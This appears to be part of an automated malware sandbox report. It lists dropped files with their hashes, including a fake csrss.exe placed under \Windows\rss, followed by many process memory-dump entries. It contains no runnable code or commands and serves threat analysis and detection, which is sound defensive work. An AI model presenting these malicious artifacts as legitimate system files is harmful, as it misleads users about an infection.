f395e3d2c71117f5b8256ec25172f280ae74b99e4e7c3eec40e21ab14d486dfaeed3851437851deab9c7c54c3725b3c5a485e562cdd02e548ee9edd1df031e8e

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe
Filesize
591KB

MD5
e2f68dc7fbd6e0bf031ca3809a739346

SHA1
9c35494898e65c8a62887f28e04c0359ab6f63f5

SHA256
b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

SHA512
26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

Download Submit
\Users\Admin\AppData\Local\Temp\symsrv.dll
Filesize
163KB

MD5
5c399d34d8dc01741269ff1f1aca7554

SHA1
e0ceed500d3cef5558f3f55d33ba9c3a709e8f55

SHA256
e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f

SHA512
8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

Download Submit
\Windows\rss\csrss.exe
Filesize
2.4MB

MD5
d673f41dacca051cc4f1e8956160affa

SHA1
a741fb8d904c9547a529ed9638c1242261e0cbf5

SHA256
882cf63d4246a00bbba4da23e5d71b9da9c92810bce8267fa7458052ae6fa68b

SHA512
8f9eae8ffccfad1ce9abb51a2426be9ab97562641e669db1994415fedd7f2160799e999c297404c0ba13ca58e1be888a4cd14c928d1b4b06921d37f65d0f9dfc

Download Submit
\Windows\rss\csrss.exe
Filesize
3.3MB

MD5
31b26a23f94ef8ed2cbb13598f16c7c9

SHA1
717a56daafcce79b44aa998a4a5caa5969cac755

SHA256
065b81c65931c9981a406e1f102cb67ff86b1b99458dd77d4765280cada9c6d1

SHA512
ed29f75bb12a8b987ea8079301a9f0de2585f014d2726b91b829a66a660d70a960f0a6e0e0e5e422b32a834a050963c5ce56c9a418a6033fb97235b876e60953

Download Submit
memory/280-84-0x0000000074C70000-0x000000007535E000-memory.dmp

Filesize
6.9MB

Download
memory/280-83-0x0000000000C70000-0x0000000000CC2000-memory.dmp

Filesize
328KB

Download
memory/280-168-0x0000000074C70000-0x000000007535E000-memory.dmp

Filesize
6.9MB

Download
memory/280-85-0x0000000000AF0000-0x0000000000B30000-memory.dmp

Filesize
256KB

Download
memory/280-195-0x0000000000AF0000-0x0000000000B30000-memory.dmp

Filesize
256KB

Download
memory/332-198-0x000007FEF6270000-0x000007FEF6C0D000-memory.dmp

Filesize
9.6MB

Download
memory/332-200-0x0000000002BB0000-0x0000000002C30000-memory.dmp

Filesize
512KB

Download
memory/332-199-0x0000000002BB0000-0x0000000002C30000-memory.dmp

Filesize
512KB

Download
memory/332-197-0x0000000002BB0000-0x0000000002C30000-memory.dmp

Filesize
512KB

Download
memory/332-230-0x000007FEF6270000-0x000007FEF6C0D000-memory.dmp

Filesize
9.6MB

Download
memory/332-196-0x000007FEF6270000-0x000007FEF6C0D000-memory.dmp

Filesize
9.6MB

Download
memory/340-239-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/340-253-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/660-315-0x00000000008D0000-0x000000000092A000-memory.dmp

Filesize
360KB

Download
memory/660-360-0x0000000074C70000-0x000000007535E000-memory.dmp

Filesize
6.9MB

Download
memory/660-348-0x0000000002020000-0x0000000004020000-memory.dmp

Filesize
32.0MB

Download
memory/660-316-0x0000000074C70000-0x000000007535E000-memory.dmp

Filesize
6.9MB

Download
memory/1084-180-0x0000000077A70000-0x0000000077C19000-memory.dmp

Filesize
1.7MB

Download
memory/1084-113-0x0000000077A70000-0x0000000077C19000-memory.dmp

Filesize
1.7MB

Download
memory/1084-112-0x0000000077A70000-0x0000000077C19000-memory.dmp

Filesize
1.7MB

Download
memory/1092-208-0x0000000002500000-0x0000000002516000-memory.dmp

Filesize
88KB

Download
memory/1248-68-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

Filesize
4KB

Download
memory/1248-73-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1248-66-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1248-65-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1248-64-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1248-63-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1248-69-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1248-67-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1248-71-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1456-166-0x00000000002F0000-0x00000000003F0000-memory.dmp

Filesize
1024KB

Download
memory/1456-165-0x00000000001B0000-0x00000000001B9000-memory.dmp

Filesize
36KB

Download
memory/1524-328-0x0000000074C70000-0x000000007535E000-memory.dmp

Filesize
6.9MB

Download
memory/1524-424-0x0000000004E90000-0x0000000004F87000-memory.dmp

Filesize
988KB

Download
memory/1524-358-0x0000000004E90000-0x0000000004F8E000-memory.dmp

Filesize
1016KB

Download
memory/1524-364-0x0000000004E90000-0x0000000004F87000-memory.dmp

Filesize
988KB

Download
memory/1524-365-0x0000000004E90000-0x0000000004F87000-memory.dmp

Filesize
988KB

Download
memory/1524-367-0x0000000004E90000-0x0000000004F87000-memory.dmp

Filesize
988KB

Download
memory/1524-369-0x0000000004E90000-0x0000000004F87000-memory.dmp

Filesize
988KB

Download
memory/1524-371-0x0000000004E90000-0x0000000004F87000-memory.dmp

Filesize
988KB

Download
memory/1524-413-0x0000000074C70000-0x000000007535E000-memory.dmp

Filesize
6.9MB

Download
memory/1524-353-0x00000000049A0000-0x0000000004A9C000-memory.dmp

Filesize
1008KB

Download
memory/1524-351-0x0000000004B70000-0x0000000004BB0000-memory.dmp

Filesize
256KB

Download
memory/1524-346-0x0000000004280000-0x000000000437C000-memory.dmp

Filesize
1008KB

Download
memory/1524-327-0x00000000000E0000-0x00000000001FA000-memory.dmp

Filesize
1.1MB

Download
memory/1540-209-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/1540-163-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/1540-167-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/1540-161-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/1756-337-0x0000000000400000-0x0000000000454000-memory.dmp

Filesize
336KB

Download
memory/1756-361-0x0000000000400000-0x0000000000454000-memory.dmp

Filesize
336KB

Download
memory/1756-331-0x0000000000400000-0x0000000000454000-memory.dmp

Filesize
336KB

Download
memory/1756-349-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/1756-347-0x0000000000400000-0x0000000000454000-memory.dmp

Filesize
336KB

Download
memory/1756-345-0x0000000000400000-0x0000000000454000-memory.dmp

Filesize
336KB

Download
memory/1756-354-0x0000000000400000-0x0000000000454000-memory.dmp

Filesize
336KB

Download
memory/1756-357-0x0000000000400000-0x0000000000454000-memory.dmp

Filesize
336KB

Download
memory/1944-114-0x0000000000030000-0x0000000000044000-memory.dmp

Filesize
80KB

Download
memory/2072-373-0x0000000006D80000-0x0000000007160000-memory.dmp

Filesize
3.9MB

Download
memory/2072-379-0x0000000000670000-0x0000000000680000-memory.dmp

Filesize
64KB

Download
memory/2072-122-0x0000000001330000-0x000000000189C000-memory.dmp

Filesize
5.4MB

Download
memory/2072-123-0x0000000074C70000-0x000000007535E000-memory.dmp

Filesize
6.9MB

Download
memory/2072-124-0x0000000004FA0000-0x0000000004FE0000-memory.dmp

Filesize
256KB

Download
memory/2072-203-0x0000000074C70000-0x000000007535E000-memory.dmp

Filesize
6.9MB

Download
memory/2072-205-0x0000000004FA0000-0x0000000004FE0000-memory.dmp

Filesize
256KB

Download
memory/2072-412-0x0000000074C70000-0x000000007535E000-memory.dmp

Filesize
6.9MB

Download
memory/2072-386-0x0000000004FA0000-0x0000000004FE0000-memory.dmp

Filesize
256KB

Download
memory/2072-374-0x0000000007160000-0x00000000072F2000-memory.dmp

Filesize
1.6MB

Download
memory/2072-388-0x0000000004FA0000-0x0000000004FE0000-memory.dmp

Filesize
256KB

Download
memory/2072-387-0x0000000004FA0000-0x0000000004FE0000-memory.dmp

Filesize
256KB

Download
memory/2072-381-0x0000000004FA0000-0x0000000004FE0000-memory.dmp

Filesize
256KB

Download
memory/2072-382-0x0000000004FA0000-0x0000000004FE0000-memory.dmp

Filesize
256KB

Download
memory/2072-383-0x0000000004FA0000-0x0000000004FE0000-memory.dmp

Filesize
256KB

Download
memory/2072-384-0x0000000004FA0000-0x0000000004FE0000-memory.dmp

Filesize
256KB

Download
memory/2072-385-0x0000000004FA0000-0x0000000004FE0000-memory.dmp

Filesize
256KB

Download
memory/2196-394-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2196-396-0x0000000000400000-0x00000000004D4000-memory.dmp

Filesize
848KB

Download
memory/2196-402-0x0000000074C70000-0x000000007535E000-memory.dmp

Filesize
6.9MB

Download
memory/2196-400-0x0000000000400000-0x00000000004D4000-memory.dmp

Filesize
848KB

Download
memory/2196-389-0x0000000000400000-0x00000000004D4000-memory.dmp

Filesize
848KB

Download
memory/2196-391-0x0000000000400000-0x00000000004D4000-memory.dmp

Filesize
848KB

Download
memory/2196-392-0x0000000000400000-0x00000000004D4000-memory.dmp

Filesize
848KB

Download
memory/2196-393-0x0000000000400000-0x00000000004D4000-memory.dmp

Filesize
848KB

Download
memory/2196-398-0x0000000000400000-0x00000000004D4000-memory.dmp

Filesize
848KB

Download
memory/2376-190-0x00000000024D0000-0x00000000028C8000-memory.dmp

Filesize
4.0MB

Download
memory/2376-202-0x00000000028D0000-0x00000000031BB000-memory.dmp

Filesize
8.9MB

Download
memory/2376-217-0x00000000028D0000-0x00000000031BB000-memory.dmp

Filesize
8.9MB

Download
memory/2376-215-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/2376-218-0x00000000024D0000-0x00000000028C8000-memory.dmp

Filesize
4.0MB

Download
memory/2376-201-0x00000000024D0000-0x00000000028C8000-memory.dmp

Filesize
4.0MB

Download
memory/2376-204-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/2464-95-0x0000000000020000-0x0000000000021000-memory.dmp

Filesize
4KB

Download
memory/2484-206-0x0000000000470000-0x0000000000471000-memory.dmp

Filesize
4KB

Download
memory/2732-229-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/2732-216-0x0000000002640000-0x0000000002A38000-memory.dmp

Filesize
4.0MB

Download
memory/2732-219-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/2732-214-0x0000000002640000-0x0000000002A38000-memory.dmp

Filesize
4.0MB

Download
memory/3012-228-0x0000000002580000-0x0000000002978000-memory.dmp

Filesize
4.0MB

Download
memory/3012-307-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/3012-425-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/3012-380-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/3012-401-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/3012-231-0x0000000002580000-0x0000000002978000-memory.dmp

Filesize
4.0MB

Download
memory/3012-232-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/3048-0-0x0000000000980000-0x0000000000988000-memory.dmp

Filesize
32KB

Download
memory/3048-75-0x00000000006B0000-0x00000000006F0000-memory.dmp

Filesize
256KB

Download
memory/3048-74-0x0000000074C70000-0x000000007535E000-memory.dmp

Filesize
6.9MB

Download
memory/3048-2-0x00000000006B0000-0x00000000006F0000-memory.dmp

Filesize
256KB

Download
memory/3048-1-0x0000000074C70000-0x000000007535E000-memory.dmp

Filesize
6.9MB

Download